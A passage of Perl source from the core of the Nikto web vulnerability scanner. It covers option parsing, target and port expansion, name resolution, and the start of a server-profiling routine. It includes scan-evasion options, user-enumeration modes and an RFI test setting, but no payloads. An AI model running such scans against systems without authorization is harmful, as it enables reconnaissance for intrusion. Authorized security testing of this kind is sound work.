$OUTPUT{'verbose'} = $CLI{'skiplookup'} =\n      $COUNTERS{'totalrequests'} = $OUTPUT{'debug'} = $OUTPUT{'scrub'} = $OUTPUT{'errors'} = 0;\n    $CLI{'all_options'} = join(\" \", @ARGV);\n    $CLI{'all_options'} =~ s/(\\-id?\\s[^\\s:]+:)[^\\s]+/$1****/i;\n\n    GetOptions(\"ask=s\"            => \\$CLI{'ask'},\n               \"Add-header=s\"     => \\@{ $CLI{'headers'} },\n               \"check6\"           => \\$CLI{'check6'},\n               \"Cgidirs=s\"        => \\$CLI{'forcecgi'},\n               \"config=s\"         => \\$CLI{'config'},\n               \"dbcheck\"          => \\&check_dbs,\n               \"Display=s\"        => \\$CLI{'display'},\n               \"evasion=s\"        => \\$CLI{'evasion'},\n               \"followredirects\"  => \\$CLI{'followredirects'},\n               \"Format=s\"         => \\$CLI{'format'},\n               \"Help\"             => \\&usage,\n               \"host=s\"           => \\$CLI{'host'},\n               \"id=s\"             => \\$CLI{'hostauth'},\n               \"key=s\"            => \\$CLI{'key'},\n               \"list-plugins\"     => \\&list_plugins,\n               \"maxtime=s\"        => \\$CLI{'maxtime'},\n               \"mutate-options=s\" => \\$CLI{'mutate-options'},\n               \"mutate=s\"         => \\$CLI{'mutate'},\n               \"nointeractive\"    => \\$CLI{'nointeractive'},\n               \"nolookup\"         => \\$CLI{'skiplookup'},\n               \"nossl\"            => \\$CLI{'nossl'},\n               \"Option=s\"         => \\@options,\n               \"output=s\"         => \\$CLI{'file'},\n               \"Pause=f\"          => \\$CLI{'pause'},\n               \"Plugins=s\"        => \\$CLI{'plugins'},\n               \"Platform=s\"       => \\$CLI{'platform'},\n               \"RSAcert=s\"        => \\$CLI{'cert'},\n               \"port=s\"           => \\$CLI{'ports'},\n               \"root=s\"           => \\$CLI{'root'},\n               \"ssl\"              => \\$CLI{'ssl'},\n               \"noslash\"          => \\$CLI{'noslash'},\n               \"Save=s\"           => \\$CLI{'saveresults'},\n               \"timeout=i\"        => \\$CLI{'timeout'},\n               \"Tuning=s\"         => \\$CLI{'tuning'},\n               \"Userdbs:s\"        => \\$CLI{'userdbs'},\n               \"nocheck\"          => \\$CLI{'nocheck'},\n               \"nocookies\"        => \\$CLI{'nocookies'},\n               \"useproxy:s\"       => \\$CLI{'useproxy'},\n               \"useragent=s\"      => \\$CLI{'useragent'},\n               \"url=s\"            => \\$CLI{'host'},\n               \"Version\"          => \\&version,\n               \"vhost=s\"          => \\$CLI{'vhost'},\n               \"404string=s\"      => \\$CLI{'404string'},\n               \"404code=s\"        => \\$CLI{'404code'},\n               \"ipv6\"             => \\$CLI{'ipv6'},\n               \"ipv4\"             => \\$CLI{'ipv4'},\n               )\n      or usage();\n\n    # Validate that -followredirects doesn't have an argument, a common confusion with -Format\n    if ($CLI{'followredirects'}) {\n        if ($CLI{'all_options'} =~ /\\-f(ollowredirects)?\\s+[^-]/) {\n            nprint(\n                \"+ ERROR: -f (-followredirects) does not accept arguments. Use -F for output format (e.g., -F html)\"\n                );\n            exit 1;\n        }\n    }\n\n    # Run a test for IPv6 connectivity\n    if ($CLI{'check6'}) {\n        check_ipv6();\n    }\n\n    # both -host and -url\n    if (($CLI{'host'} ne '') && ($CLI{'url'} ne '')) {\n        nprint(\"+ ERROR: Cannot use -url and -host at the same time\");\n        exit 1;\n    }\n\n    # -ipv4 and -ipv6 validations\n    if ($CLI{'ipv4'} && $CLI{'ipv6'}) {\n        nprint(\"+ ERROR: Cannot use -ipv4 and -ipv6 at the same time\");\n        exit 1;\n    }\n    if ($CLI{'ipv6'}) {\n        $CLI{'ipv4'} = 0;\n    }\n    else {\n        $CLI{'ipv4'} = 1;\n    }\n\n    # 404string\n    if ($CLI{'404string'} ne '') {\n        my $s = validate_and_fix_regex($CLI{'404string'});\n        $VARIABLES{'ERRSTRINGS'}->{$s} = 1;\n    }\n\n    # 404code\n    if ($CLI{'404code'} ne '') {\n        foreach my $code (split(/\\s?,\\s?/, $CLI{'404code'})) {\n            $code =~ s/^\\s+|\\s+$//g;    # Trim whitespace\n            if ($code =~ /[^\\d]/) {\n                nprint(\"+ ERROR: Invalid 404code, must be an integer\");\n                exit 1;\n            }\n            $VARIABLES{'ERRCODES'}->{$code} = 1;\n        }\n    }\n\n    # Maxtime must be seconds\n    if ($CLI{'maxtime'} ne '') {\n        $CLI{'maxtime'} = time_to_seconds($CLI{'maxtime'});\n        if ($CLI{'maxtime'} eq '') {\n            nprint(\"+ ERROR: Invalid maxtime value, must be a valid time (e.g., 3600s, 60m, 1h)\");\n            exit 1;\n        }\n    }\n\n    # options allows overriding of nikto.conf entries on command line\n    foreach my $option (@options) {\n        my @optione = split(\"=\", $option, 2);\n        $CONFIGFILE{ $optione[0] } = $optione[1];\n    }\n\n    # Userdb type: blank is db_tests only, so 'all' is only valid option\n    if (defined($CLI{'userdbs'})) {\n        if   ($CLI{'userdbs'} =~ /^all$/i) { $CLI{'userdbs'} = 'all'; }\n        else                               { $CLI{'userdbs'} = 'tests'; }\n    }\n\n    # CLI proxy overrides nikto.conf\n    if ((defined($CLI{'useproxy'})) && ($CLI{'useproxy'} ne '')) {\n        if ($CLI{'useproxy'} !~ /^https?:\\/\\//) { $CLI{'useproxy'} = \"http://$CLI{'useproxy'}\"; }\n        my @prox = LW2::uri_split($CLI{'useproxy'});\n        $CONFIGFILE{'PROXYHOST'} = $prox[2];\n        $CONFIGFILE{'PROXYPORT'} = $prox[3];\n        $CONFIGFILE{'PROXYUSER'} = $prox[6];\n        $CONFIGFILE{'PROXYPASS'} = $prox[7];\n    }\n    elsif (defined($CLI{'useproxy'})) { $CLI{'useproxy'} = 1; }\n    else {\n        undef $CONFIGFILE{'PROXYHOST'};\n        undef $CONFIGFILE{'PROXYPORT'};\n        undef $CONFIGFILE{'PROXYUSER'};\n        undef $CONFIGFILE{'PROXYPASS'};\n    }\n\n    # Save Results\n    if (defined($CLI{'saveresults'})) {\n        if ($CLI{'saveresults'} eq '') {\n            nprint(\"+ ERROR: -Save must have a directory name or '.' for auto-generated\");\n            exit 1;\n        }\n        eval \"require JSON::PP\";\n        if ($@) {\n            nprint(\"+ ERROR: Module JSON::PP missing.\");\n            exit 1;\n        }\n    }\n\n    # Parse comma-separated formats early (before validation)\n    my @formats_raw = ();\n    if (defined $CLI{'format'} && $CLI{'format'} ne '') {\n        @formats_raw = split(/,/, $CLI{'format'});\n    }\n\n    # If no format specified, try to infer from file extension later\n    my @formats      = ();\n    my %formats_hash = ();\n\n    foreach my $fmt (@formats_raw) {\n        $fmt =~ s/^\\s+|\\s+$//g;    # Trim whitespace\n        $fmt = lc($fmt);\n        $fmt = 'txt' if $fmt eq 'text';\n        $fmt = 'htm' if $fmt eq 'html';\n\n        if ($fmt !~ /^(?:txt|htm|csv|json|sql|sqld|xml|none)$/) {\n            nprint(\"+ ERROR: Invalid output format: $fmt\");\n            exit 1;\n        }\n\n        # Avoid duplicates\n        if (!exists $formats_hash{$fmt}) {\n            push(@formats, $fmt);\n            $formats_hash{$fmt} = 1;\n        }\n    }\n\n    # Store formats array for later use\n    $CLI{'formats'} = \\@formats;\n\n    # Keep first format for backward compatibility with single-format code paths\n    $CLI{'format'} = $formats[0] if @formats > 0;\n\n    # Check XML dependencies (check if xml is in formats)\n    if (grep { $_ eq 'xml' } @formats) {\n        eval \"require XML::Writer\";\n        if ($@) {\n            nprint(\"+ ERROR: Module XML::Writer missing. Install with: cpan XML::Writer\");\n            exit 1;\n        }\n    }\n\n    # port(s)\n    if (defined $CLI{'ports'}) {\n        $CLI{'ports'} =~ s/^\\s+//;\n        $CLI{'ports'} =~ s/\\s+$//;\n        if ($CLI{'ports'} =~ /[^0-9\\-\\, ]/) {\n            nprint(\"+ ERROR: Invalid port option '$CLI{'ports'}'\");\n            exit 1;\n        }\n    }\n\n    # output file - infer format from extension if not specified\n    if (@formats == 0) {\n\n        # No format specified, try to infer from file\n        if (defined $CLI{'file'} && $CLI{'file'} ne '' && $CLI{'file'} ne '.') {\n            my $ext = lc($CLI{'file'});\n            $ext =~ s/(^.*\\.)([^.]*$)/$2/g;\n            $ext = 'txt' if $ext eq 'text';\n            $ext = 'htm' if $ext eq 'html';\n            if ($ext =~ /^(?:txt|htm|csv|json|sql|sqld|xml)$/) {\n                push(@formats, $ext);\n                $CLI{'formats'} = \\@formats;\n                $CLI{'format'}  = $ext;\n            }\n            else {\n                $CLI{'format'} = 'none';\n                push(@formats, 'none');\n                $CLI{'formats'} = \\@formats;\n            }\n        }\n        else {\n            $CLI{'format'} = 'none';\n            push(@formats, 'none');\n            $CLI{'formats'} = \\@formats;\n        }\n    }\n\n    # Check if we need files for any format\n    my $needs_file = 0;\n    foreach my $fmt (@formats) {\n        if (($fmt ne \"none\") && ($fmt ne \"sqld\")) {\n            $needs_file = 1;\n            last;\n        }\n    }\n\n    # Initialize files hash\n    $CLI{'files'} = {};\n\n    # File naming logic\n    if ($CLI{'file'} eq '.') {\n\n        # Auto-generate file names for each format\n        if (@formats == 0 || ($formats[0] eq '')) {\n            nprint(\"+ ERROR: Output format must be used with auto file naming\");\n            exit 1;\n        }\n\n        my $hn = $CLI{'host'};\n        $hn =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        $hn =~ s/_+/_/g;\n        my $port = $CLI{'ports'};\n        $port =~ s/,/\\-/g;\n        $port =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        my $now = date_disp(time());\n        $now =~ s/[^0-9-]/-/g;\n        my $base_name = \"nikto_\" . $hn . \"_\" . $port . \"_\" . $now;\n        $base_name =~ s/_+/_/g;\n\n        # Generate file names for each format\n        foreach my $fmt (@formats) {\n            next if ($fmt eq \"none\" || $fmt eq \"sqld\");    # These don't need files\n\n            my $file_name = $base_name . \".\" . $fmt;\n\n            # Check if file exists and add counter if needed\n            if (-e $file_name) {\n                $file_name =~ /^(.*)(\\.[a-z]{3,4})/;\n                my $fn     = $1;\n                my $ext    = $2;\n                my $ctr    = 0;\n                my $exists = 1;\n                while ($exists) {\n                    $ctr++;\n                    my $new_name = $fn . \"_\" . $ctr . $ext;\n                    if (!-e $new_name) {\n                        $file_name = $new_name;\n                        $exists    = 0;\n                    }\n                }\n            }\n\n            $CLI{'files'}{$fmt} = $file_name;\n            nprint(\"- Auto-generated save file: $file_name\",\n                   \"v\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        }\n    }\n    elsif (defined $CLI{'file'} && $CLI{'file'} ne '' && $CLI{'file'} ne '.') {\n\n        # Use filename as prefix, append format extensions\n        my $prefix = $CLI{'file'};\n\n        # Generate file names for each format\n        foreach my $fmt (@formats) {\n            if ($fmt eq \"none\" || $fmt eq \"sqld\") {\n                $CLI{'files'}{$fmt} = \"\";    # No file for these formats\n                next;\n            }\n\n            # Append format extension to prefix only if not already present\n            my $file_name;\n            if ($prefix =~ /\\.\\Q$fmt\\E$/i) {\n                $file_name = $prefix;\n            }\n            else {\n                $file_name = $prefix . \".\" . $fmt;\n            }\n            $CLI{'files'}{$fmt} = $file_name;\n        }\n    }\n    else {\n        # No file specified - only sqld/none formats allowed\n        foreach my $fmt (@formats) {\n            if ($fmt eq \"none\" || $fmt eq \"sqld\") {\n                $CLI{'files'}{$fmt} = \"\";\n            }\n        }\n    }\n\n    # Validation: If file-based formats are specified but no output file, default to auto-generation\n    if ((!defined $CLI{'file'} || $CLI{'file'} eq '') && $needs_file) {\n        $CLI{'file'} = '.';\n\n        # Re-run the auto-generation logic above (simplified, since formats are already parsed)\n        my $hn = $CLI{'host'};\n        $hn =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        $hn =~ s/_+/_/g;\n        my $port = $CLI{'ports'};\n        $port =~ s/,/\\-/g;\n        $port =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        my $now = date_disp(time());\n        $now =~ s/[^0-9-]+/-/g;\n        my $base_name = \"nikto_\" . $hn . \"_\" . $port . \"_\" . $now;\n        $base_name =~ s/_+/_/g;\n\n        foreach my $fmt (@formats) {\n            next if ($fmt eq \"none\" || $fmt eq \"sqld\");\n\n            my $file_name = $base_name . \".\" . $fmt;\n\n            if (-e $file_name) {\n                $file_name =~ /^(.*)(\\.[a-z]{3,4})/;\n                my $fn     = $1;\n                my $ext    = $2;\n                my $ctr    = 0;\n                my $exists = 1;\n                while ($exists) {\n                    $ctr++;\n                    my $new_name = $fn . \"_\" . $ctr . $ext;\n                    if (!-e $new_name) {\n                        $file_name = $new_name;\n                        $exists    = 0;\n                    }\n                }\n            }\n\n            $CLI{'files'}{$fmt} = $file_name;\n            nprint(\"- Auto-generated save file: $file_name\",\n                   \"v\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        }\n    }\n\n    # Validation checks\n    if ((defined $CLI{'file'}) && (@formats == 0 || ($formats[0] eq \"\"))) {\n        nprint(\"+ ERROR: Output file specified without a format\");\n        exit 1;\n    }\n\n    if ((!defined $CLI{'file'} || $CLI{'file'} eq '') && $needs_file && @formats > 0) {\n        nprint(\"+ ERROR: Output file format specified without a name\");\n        exit 1;\n    }\n\n    # verify readable dtd (check all formats for xml)\n    if (grep { $_ eq 'xml' } @formats) {\n        if (!defined $CONFIGFILE{'NIKTODTD'} || $CONFIGFILE{'NIKTODTD'} eq '') {\n            nprint(\"+ ERROR: DTD not defined in configuration\");\n            exit 1;\n        }\n\n        # Check if DTD file exists\n        my $dtd_path = $CONFIGFILE{'NIKTODTD'};\n        if ($dtd_path !~ /^\\// && defined $CONFIGFILE{'EXECDIR'}) {\n            $dtd_path = \"$CONFIGFILE{'EXECDIR'}/$dtd_path\";\n        }\n\n        if (!-f $dtd_path) {\n            nprint(\"+ ERROR: DTD file not found: $dtd_path\");\n            nprint(\"+ Please check your nikto.conf configuration\");\n            exit 1;\n        }\n    }\n\n    # screen output\n    if (defined $CLI{'display'}) {\n        if ($CLI{'display'} =~ /d/i) { $OUTPUT{'debug'}          = 1; }\n        if ($CLI{'display'} =~ /v/i) { $OUTPUT{'verbose'}        = 1; }\n        if ($CLI{'display'} =~ /s/i) { $OUTPUT{'scrub'}          = 1; }\n        if ($CLI{'display'} =~ /e/i) { $OUTPUT{'errors'}         = 1; }\n        if ($CLI{'display'} =~ /p/i) { $OUTPUT{'progress'}       = 1; }\n        if ($CLI{'display'} =~ /1/i) { $OUTPUT{'show_redirects'} = 1; }\n        if ($CLI{'display'} =~ /2/i) { $OUTPUT{'show_cookies'}   = 1; }\n        if ($CLI{'display'} =~ /3/i) { $OUTPUT{'show_ok'}        = 1; }\n        if ($CLI{'display'} =~ /4/i) { $OUTPUT{'show_auth'}      = 1; }\n    }\n\n    # Fixup\n    if (defined $CLI{'root'}) {\n        $CLI{'root'} =~ s/\\/$//;\n        if (($CLI{'root'} !~ /^\\//) && ($CLI{'root'} ne \"\")) { $CLI{'root'} = \"/$CLI{'root'}\"; }\n    }\n\n    if (defined $CLI{'evasion'}) {\n        $CLI{'evasion'} =~ s/[^1-8AB]//g;\n    }\n\n    if (!defined $CLI{'plugins'} || $CLI{'plugins'} eq \"\") {\n        $CLI{'plugins'} = '@@DEFAULT';\n    }\n\n    # Mapping for mutate for plugins\n    if (defined $CLI{'mutate'}) {\n        if ($CLI{'mutate'} =~ /1/ || $CLI{'mutate'} =~ /2/) {\n            my $parameters;\n            $parameters = \"passfiles\" if ($CLI{'mutate'} =~ /2/);\n            $parameters .= \",all\" if ($CLI{'mutate'} =~ /1/);\n            $CLI{'plugins'} .= ';tests(' . $parameters . ')';\n        }\n        if ($CLI{'mutate'} =~ /3/ || $CLI{'mutate'} =~ /4/) {\n            my $parameters;\n            $parameters = \"enumerate\";\n            $parameters .= \",home\"    if ($CLI{'mutate'} =~ /3/);\n            $parameters .= \",cgiwrap\" if ($CLI{'mutate'} =~ /4/);\n            $parameters .= \",dictionary:\" . $CLI{'mutate-options'}\n              if (defined $CLI{'mutate-options'});\n            $CLI{'plugins'} .= ';apacheusers(' . $parameters . ')';\n        }\n        if ($CLI{'mutate'} =~ /6/) {\n            $CLI{'plugins'} .= ';dictionary(dictionary:' . $CLI{'mutate-options'} . ')';\n        }\n        nprint(\n            \"- Mutate is deprecated, use -Plugins instead. The following option can be used in future: -Plugin $CLI{'plugins'}\"\n            );\n    }\n\n    # Asking questions?\n    if ($CLI{'ask'} =~ /^(?:auto|yes|no)$/) {\n        $CONFIGFILE{'UPDATES'} = $CLI{'ask'};    # override nikto.conf setting\n        undef($CLI{'ask'});\n    }\n\n    $CLI{'timeout'} = $CLI{'timeout'} || 10;\n\n    # RFI URL -- push it to VARIABLES\n    if (defined $CONFIGFILE{'RFIURL'}) {\n        $VARIABLES{'@RFIURL'} = $CONFIGFILE{'RFIURL'};\n    }\n    else {\n        nprint(\"- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****\");\n    }\n\n    # SSL Test\n    if (!LW2::ssl_is_available()) {\n        nprint(\"- ***** TLS/SSL support not available (see docs for SSL install) *****\");\n        if ($CLI{'ssl'} || ($CLI{'host'} =~ /^https/i)) {\n            nprint(\"- ERROR: -ssl was specified but TLS/SSL is not available.\");\n            exit 1;\n        }\n    }\n\n    # get core version\n    open(FI, \"<$CONFIGFILE{'PLUGINDIR'}/nikto_core.plugin\");\n    my @F = <FI>;\n    close(FI);\n    my @VERS = grep(/^#VERSION/, @F);\n    $VARIABLES{'core_version'} = $VERS[0];\n    $VARIABLES{'core_version'} =~ s/\\#VERSION,//;\n    chomp($VARIABLES{'core_version'});\n    $VARIABLES{'TEMPL_HCTR'} = 0;\n\n    if ($^O !~ /MSWin32/) {\n        $NIKTO{'POSIX'}{'fd_stdin'} = fileno(STDIN);\n        $NIKTO{'POSIX'}{'term'}     = POSIX::Termios->new();\n        $NIKTO{'POSIX'}{'term'}->getattr($NIKTO{'POSIX'}{'fd_stdin'});\n        $NIKTO{'POSIX'}{'oterm'}  = $NIKTO{'POSIX'}{'term'}->getlflag();\n        $NIKTO{'POSIX'}{'echo'}   = ECHOE | ECHO | ECHOK | ICANON;\n        $NIKTO{'POSIX'}{'noecho'} = $NIKTO{'POSIX'}{'oterm'} & ~$NIKTO{'POSIX'}{'echo'};\n    }\n\n    if ($CLI{'pause'} > 0) {\n        nprint(\"-***** Pausing $CLI{'pause'} second(s) per request\");\n    }\n\n    # Default values\n    $COUNTERS{'totalrequests'} = 0;\n    $COUNTERS{'total_checks'}  = 0;\n    $COUNTERS{'total_targets'} = 0;\n\n    $VARIABLES{'GMTOFFSET'} = gmt_offset();\n    $VARIABLES{'DIV'}       = \"-\" x 75;\n    $VARIABLES{'deferout'}  = 0;\n    $VARIABLES{'defertxt'}  = [];\n\n    # Some Win versions can't use Time::HiRes correctly\n    $VARIABLES{'MSWIN32'} = 0;\n    if ($^O =~ /MSWin32/) {\n        $VARIABLES{'MSWIN32'} = 1;\n    }\n\n    return;\n}\n\n###############################################################################\nsub time_to_seconds {\n    my $time = $_[0] || return;\n    if ($time =~ /m$/i) {\n        $time =~ s/m$//i;\n        $time = ($time * 60);\n    }\n    elsif ($time =~ /h$/i) {\n        $time =~ s/h$//i;\n        $time = ($time * 3600);\n    }\n    elsif ($time =~ /s$/i) {\n        $time =~ s/s$//i;\n    }\n    return $time;\n}\n\n###############################################################################\nsub sleeper {\n    sleep($CLI{'pause'}) if defined $CLI{'pause'};\n}\n\n###############################################################################\nsub safe_quit {\n    my ($mark) = @_;\n\n    # When called as a signal handler, $mark is the signal name (e.g. \"INT\"), not a hashref\n    if (!ref($mark)) {\n        $mark = $NIKTO{'current_mark'};\n    }\n\n    if (ref($mark)) {\n        $mark->{'end_time'}       = time();\n        $mark->{'elapsed'}        = $mark->{'end_time'} - $mark->{'start_time'};\n        $COUNTERS{'scan_elapsed'} = (time() - $COUNTERS{'scan_start'});\n        report_host_end($mark);\n        report_summary($mark);\n        report_close($mark);\n    }\n    $NIKTO{'POSIX'}{'term'}->setlflag($NIKTO{'POSIX'}{'oterm'}) if ($^O !~ /MSWin32/);\n    exit 1;\n}\n\n###############################################################################\nsub check_input {\n    my ($mark) = @_;\n    my $key = readkey();\n    return if $key eq '';\n\n    # Key to OUTPUT field mapping for toggles\n    my %toggles = (v => 'verbose',\n                   d => 'debug',\n                   e => 'errors',\n                   p => 'progress',\n                   r => 'show_redirects',\n                   c => 'show_cookies',\n                   o => 'show_ok',\n                   a => 'show_auth',\n                   );\n\n    if ($key eq ' ') {\n        status_report($mark);\n    }\n    elsif (exists $toggles{$key}) {\n        $OUTPUT{ $toggles{$key} } = !$OUTPUT{ $toggles{$key} };\n    }\n    elsif ($key eq 'q' || ord($key) == 3) {\n        safe_quit($mark);\n    }\n    elsif ($key eq 'P') {\n        status_report($mark);\n        pause();\n    }\n    elsif ($key eq 'N') {\n        nprint(\"- Terminating host scan.\");\n        return 'term';\n    }\n    return;\n}\n###############################################################################\nsub pause {\n    return if ($^O =~ /MSWin32/);\n    nprint(\"- Pausing--press P to resume.\");\n\n    while (readkey() ne 'P') { sleep 1; }\n    nprint(\"- Resuming.\");\n}\n###############################################################################\nsub readkey {\n    return if $^O =~ /MSWin32/;    # Early return for Windows\n\n    my $key;\n    $NIKTO{'POSIX'}{'term'}->setlflag($NIKTO{'POSIX'}{'noecho'});\n    $NIKTO{'POSIX'}{'term'}->setattr($NIKTO{'POSIX'}{'fd_stdin'}, TCSANOW);\n\n    eval {\n        local $SIG{ALRM} = sub { die; };\n        ualarm(1_000);\n        sysread(STDIN, $key, 1);\n        ualarm(0);\n    };\n\n    $NIKTO{'POSIX'}{'term'}->setlflag($NIKTO{'POSIX'}{'oterm'});\n    $NIKTO{'POSIX'}{'term'}->setattr($NIKTO{'POSIX'}{'fd_stdin'}, TCSANOW);\n\n    return $key;\n}\n\n###############################################################################\nsub resolve {\n    my $ident  = $_[0] or return;\n    my $report = defined $_[1] ? $_[1] : 1;\n    my ($ip, $name, $ipcache) = \"\";\n    my (@addresses, @scrub);\n    my $is6 = 0;\n\n    if (($CONFIGFILE{'PROXYHOST'} ne '') && $CLI{'useproxy'}) {\n        return $ident, $ident, $ident;\n    }\n\n    if ($ident =~ /^$LW2::IPv4_re$/) {    # ident is IPv4\n        $ip = $name = $ident;\n    }\n    elsif ($ident =~ /^\\[?($LW2::IPv6_re_inc_zoneid)\\]?$/) {\n        $ip   = $1;\n        $name = $ident;    # HTTP host header uses [IPv6] rather than the raw IPv6 address\n    }\n    else                   # not an IP, assume name & resolve\n    {\n        if ($CLI{'skiplookup'}) {\n            nprint(\"+ ERROR: -nolookup set, but given name\\n\");\n            exit 1;\n        }\n\n        if ($LW2::LW2_CAN_IPv6) {    # IPv4/v6 resolve\n            use Socket qw(:addrinfo SOCK_RAW);\n            my ($err, @res) = Socket::getaddrinfo($ident, \"\", { socktype => SOCK_RAW });\n            if ($err) {\n                my $msg = \"ERROR: Cannot resolve hostname '$ident' because '$err'.\";\n                if ($ident =~ /^\\[?($LW2::IPv6_re_inc_zoneid)\\]?$/) {\n                    $msg .= \" Use the -ipv6 flag if needed.\";\n                }\n                if ($CLI{'ipv6'}) {\n                    $msg .=\n                      \" Ensure you have IPv6 connectivity. Trying running Nikto with the '-check6' flag.\";\n                }\n                return $ident, '', $ident, $msg;\n            }\n\n            foreach my $res (@res) {\n                my ($err, $ip) = Socket::getnameinfo($res->{addr}, NI_NUMERICHOST, NIx_NOSERV);\n                push @addresses, $ip unless $err;\n            }\n\n        }\n        else {    # Traditional IPv4 resolve\n            if ($hent = gethostbyname($ident)) {\n                my $addr_ref = $hent->addr_list;\n                @addresses = map { inet_ntoa($_) } @$addr_ref;\n            }\n        }\n\n        my @temp4_ipcache;\n        my @temp6_ipcache;\n        my %seen;\n        foreach $temp_ip (@addresses) {\n            if ($temp_ip =~ /:/) {\n                push @temp6_ipcache, $temp_ip if !$seen{$temp_ip}++;\n            }\n            else {\n                push @temp4_ipcache, $temp_ip if !$seen{$temp_ip}++;\n            }\n        }\n\n        $ip = ($CLI{'ipv6'}) ? shift @temp6_ipcache : shift @temp4_ipcache;\n        push(@scrub, $ip, @temp4_ipcache, @temp6_ipcache);\n        $ipcache = join \", \", (@temp4_ipcache, @temp6_ipcache);\n\n        if ($ip eq '') {\n            if ($CLI{'ipv6'} && scalar @temp4_ipcache) {\n                nprint(\n                    \"+ ERROR: IPv6 scanning mode requested but only IPv4 addresses found ($ipcache)\"\n                    );\n            }\n            elsif ($CLI{'ipv4'} && scalar @temp6_ipcache) {\n                nprint(\n                    \"+ ERROR: IPv4 scanning mode requested but only IPv6 addresses found ($ipcache)\"\n                    );\n            }\n            exit 1;\n        }\n\n        if ($ipcache ne \"\" && $report) {\n            nprint(\"+ Multiple IPs found: $ip, $ipcache\", \"\", @scrub);\n        }\n\n        if (   $ip !~ /^$LW2::IPv4_re$/\n            && $ip !~ /^$LW2::IPv6_re$/) {\n            nprint(\"+ ERROR: Invalid IP: $ip\\n\\n\",\n                   \"\", ($ident, $ip, $ident));\n            exit 1;\n        }\n\n        $name = $ident;\n    }\n\n    my $displayname = ($name) ? $name : $ip;\n    return $name, $ip, $displayname;\n}\n\n###############################################################################\nsub set_targets {\n    my ($hostlist, $portlist, $ssl, $root) = @_;\n    my $host_ctr  = 1;\n    my @hosts     = split(/,/, $hostlist);\n    my @tempports = split(/,/, $portlist) if defined $portlist;\n    my (@ports, @checkhosts, @results, @marks);\n    my $defaultport = ($ssl) ? 443 : 80;\n\n    nprint(\"- Getting targets\", \"v\", \"Init\");\n\n    # Check for portlist and expand\n    foreach my $port (@tempports) {\n        if ($port =~ /-/) {\n            my ($start, $end);\n            my @temp = split(/-/, $port);\n            $start = $temp[0];\n            $end   = $temp[1];\n            if ($start eq \"\") { $start = 0; }\n            if ($end eq \"\")   { $end   = 65535; }\n            if ($start > $end) {\n                nprint(\"+ ERROR port range $port doesn't make sense - assuming 80/tcp\");\n                next;\n            }\n            for (my $i = $start ; $i <= $end ; $i++) {\n                push(@ports, $i);\n            }\n        }\n        else {\n            push(@ports, $port);\n        }\n    }\n\n    # no ports explicitly set, so use default port\n    if (scalar(@ports) == 0) {\n        push(@ports, $defaultport);\n    }\n\n    # check whether -h is a file or an entry\n    foreach my $host (@hosts) {\n        if (-f $host || $host eq \"-\") {\n            @results = parse_hostfile($host);\n            push(@checkhosts, @results);\n        }\n        else {\n            push(@checkhosts, $host);\n        }\n    }\n\n    # Now parse the list of checkhosts\n    foreach my $host (@checkhosts) {\n        $host =~ s/\\s+//g;\n        if ($host eq '') { next; }\n        my $markhash = {};\n        $markhash->{'root'}      = $root;\n        $markhash->{'cookiejar'} = LW2::cookie_new_jar();\n\n        # is it a URL?\n        if ($host =~ /^https?:\\/\\//) {\n\n            if ($CLI{'ports'} ne '') {\n                nprint(\"- ERROR: The -port option cannot be used with a full URI\");\n                exit 1;\n            }\n            my @hostdata = LW2::uri_split($host);\n            $markhash->{'ident'} = $hostdata[2];\n            $markhash->{'port'}  = $hostdata[3];\n            if ($markhash->{'port'} eq '') {\n                if   ($host =~ /^https:/) { $markhash->{'port'} = 443; }\n                else                      { $markhash->{'port'} = $defaultport; }\n            }\n\n            # If URL included a path, add that as the root unless -root was specified\n            if (($hostdata[0] ne '/') && ($hostdata[0] ne '') && ($markhash->{'root'} eq '')) {\n                $hostdata[0] =~ s/\\/$//;\n                $markhash->{'root'} = $hostdata[0];\n                nprint(\"- Added -root value of '$hostdata[0]' from URI\",\n                       \"v\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n            }\n            push(@marks, $markhash);\n        }\n        else {\n            if ((index $host, '[') == 0) {    # looks like accepted IPv6 format\n                if ($host =~ /^(\\[?$LW2::IPv6_re_inc_zoneid\\]?)(?:[:](\\d+))?$/) {\n                    $markhash->{'ident'} = $1;\n                    $markhash->{'port'}  = $2;\n                    push(@marks, $markhash);\n                }\n                else {\n                    nprint(\"- ERROR: Unrecognised target host format: $host\",\n                           \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n                }\n            }\n            else {\n                my @h = split(/\\:|\\,/, $host);\n                if (scalar @h > 2 || $h[0] eq '') { # Possible invalid IPv6 format has been supplied\n                    nprint(\n                        \"- ERROR: Target host '$host' contains more than one colon (:). If specifying an IPv6 target, use the [IPv6] format.\",\n                        \"\",\n                        ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'})\n                        );\n                }\n                else {\n                    $markhash->{'ident'} = $h[0];\n                    if ($h[1] !~ /[^0-9]/ && $h[1] ne '') {\n                        $markhash->{'port'} = $h[1];\n                        push(@marks, $markhash);\n                    }\n                    else {\n                        # push unique array ref for each port\n                        my $ti = $markhash->{'ident'};\n                        my $tr = $markhash->{'root'};\n                        foreach my $p (@ports) {\n                            my $markhash = { 'port'  => $p,\n                                             'root'  => $tr,\n                                             'ident' => $ti\n                                             };\n\n                            $markhash->{'port'} = $p;\n                            push(@marks, $markhash);\n                        }\n                    }\n                }\n            }\n        }\n    }\n    return @marks;\n}\n\n###############################################################################\nsub platform_profiler {\n    if (defined $CLI{'platform'}) {\n        if ($CLI{'platform'} =~ /(nix|win|all)/i) {\n            return $CLI{'platform'};\n        }\n        else {\n            $VARIABLES{'deferout'} = 0;\n            nprint(\"+ ERROR: Invalid platform: $CLI{'platform'}\");\n            exit 1;\n        }\n    }\n\n    my ($mark) = @_;\n    my @profile_pages = (\"/\",               \"/server-status\",\n                         \"/icons/\",         \"/trace.axd\",\n                         \"/nosuchfile.asp\", \"/nosuchfile.aspx\",\n                         \"/localstart.asp\", \"/docs/\",\n                         \"/server\"\n                         );\n\n    foreach my $file (@profile_pages) {\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, $file, \"GET\", \"\", \"\", \"\", \"platform_profiler\");\n\n        # 